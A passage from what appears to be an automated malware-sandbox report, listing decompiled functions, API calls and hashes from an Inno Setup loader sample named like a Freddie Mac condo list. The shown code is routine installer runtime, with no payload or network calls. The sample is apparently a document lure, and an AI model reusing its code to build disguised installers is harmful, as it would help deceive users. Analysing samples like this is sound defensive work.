Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}

0x0040e457
0x0040e45c
0x0040e45e
0x0040e48f
0x0040e498
0x0040e4a4

APIs

CreateWindowExW.USER32 ref: 0040E48F

Strings

InnoSetupLdrWindow, xrefs: 0040E453
STATIC, xrefs: 0040E48D

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateWindow
String ID: InnoSetupLdrWindow$STATIC
API String ID: 716092398-2209255943
Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

0x004af1b4
0x004af1bb
0x004af1be
0x004af1c2
0x004af1c5
0x004af213
0x004af213
0x004af213
0x004af1c7
0x004af1c8
0x004af1ca
0x004af1ca
0x004af1cd
0x004af1da
0x004af1dd
0x004af1e3
0x004af1e3
0x004af1cf
0x004af1d3
0x004af1d3
0x004af1ed
0x004af1f4
0x00000000
0x00000000
0x004af1f6
0x004af1fe
0x00000000
0x00000000
0x004af200
0x004af208
0x00000000
0x00000000
0x004af20a
0x004af20b
0x004af20c
0x00000000
0x00000000
0x00000000
0x004af20c
0x00000000

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}

0x0041ff95
0x0041ff97
0x0041ff9f
0x0041ffa2
0x0041ffa4
0x0041ffaa
0x0041ffab
0x0041ffb0
0x0041ffb3
0x0041ffb6
0x0041ffbf
0x0041ffc7
0x0041ffd9
0x0041ffde
0x0041ffe2
0x00420080
0x00420083
0x00420086
0x00420093
0x0041ffe8
0x0041ffef
0x0041fff4
0x0041fff5
0x0041fffa
0x0041fffd
0x00420012
0x00420019
0x00420041
0x0042004a
0x0042005b
0x0042005d
0x0042005d
0x00420063
0x00420066
0x00420069
0x00420076
0x00420076

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID:
API String ID: 2179348866-0
Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765

Uniqueness

Uniqueness Score: -1.00%

Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

0x0040b110
0x0040b110
0x0040b113
0x0040b115
0x0040b117
0x0040b119
0x0040b11b
0x0040b11d
0x0040b11f
0x0040b120
0x0040b121
0x0040b123
0x0040b126
0x0040b12c
0x0040b134
0x0040b13b
0x0040b13c
0x0040b141
0x0040b144
0x0040b149
0x0040b152
0x0040b20c
0x0040b20e
0x0040b211
0x0040b214
0x0040b226
0x0040b226
0x0040b15e
0x0040b163
0x0040b168
0x0040b16d
0x0040b16d
0x0040b16f
0x0040b174
0x0040b19b
0x0040b1a1
0x0040b1aa
0x0040b1bb
0x0040b1c3
0x0040b1d0
0x0040b1d5
0x0040b1d8
0x0040b1da
0x0040b1e1
0x0040b1e3
0x0040b1eb
0x0040b1f8
0x0040b1f8
0x0040b1e1
0x0040b1fd
0x0040b200
0x0040b207
0x0040b207
0x0040b1ac
0x0040b1b4
0x0040b1b4
0x00000000
0x0040b1aa
0x0040b176
0x0040b196
0x0040b197
0x0040b199
0x00000000
0x00000000
0x00000000
0x0040b199
0x0040b185
0x0040b18f
0x00000000

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55
libraryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}

0x0040b241
0x0040b247
0x0040b24d
0x0040b250
0x0040b254
0x0040b255
0x0040b25a
0x0040b25d
0x0040b270
0x0040b27d
0x0040b288
0x0040b29a
0x0040b2a8
0x0040b2a9
0x0040b2b2
0x0040b2c1
0x0040b2c6
0x0040b2ca
0x0040b2cd
0x0040b2d0
0x0040b2e0
0x0040b2ed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00427155
0x00427157
0x0042716c
0x00427177
0x00427178
0x0042717d
0x00427180
0x0042718b
0x00427190
0x00427198
0x0042719d
0x004271a0
0x004271a3
0x004271b0
0x0042716e
0x00427170
0x004271c9
0x004271c9

APIs

DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698

Uniqueness

Uniqueness Score: -1.00%

Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x00421231
0x00421233
0x00421237
0x0042123a
0x0042123f
0x00421244
0x00421245
0x0042124a
0x0042124d
0x00421250
0x00421255
0x00421256
0x0042125b
0x0042125e
0x00421269
0x0042126e
0x00421273
0x00421276
0x00421279
0x0042127e
0x00421280
0x00421283

APIs

SetErrorMode.KERNEL32 ref: 0042123A
LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574

Uniqueness

Uniqueness Score: -1.00%

Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}

0x004052e2
0x004052f9
0x004052e7
0x004052f2
0x004052f7
0x004052f7
0x004052fd
0x00405302
0x00405307
0x00405309
0x0040530e
0x00405311
0x0040531a
0x0040531d
0x00405320
0x00405320
0x00405323
0x00405325
0x00405328
0x0040532d
0x00405332
0x00405332
0x00405334
0x00405336
0x00405336
0x00405339
0x0040533c
0x0040533c
0x00405341
0x00405352
0x00405357
0x00405359
0x0040535e
0x00405375
0x00405363
0x0040536e
0x00405373
0x00405373
0x00405379
0x0040537b
0x00405382

APIs

VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C

Uniqueness

Uniqueness Score: -1.00%

Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}

0x004232f3
0x0042330b
0x00423313
0x00423317
0x00423320
0x00423312
0x00423312
0x00423312
0x00000000
0x00423322
0x00423322
0x00423326
0x00000000
0x00000000
0x00423326
0x00000000
0x00423320
0x00423339

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E

Uniqueness

Uniqueness Score: -1.00%

Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
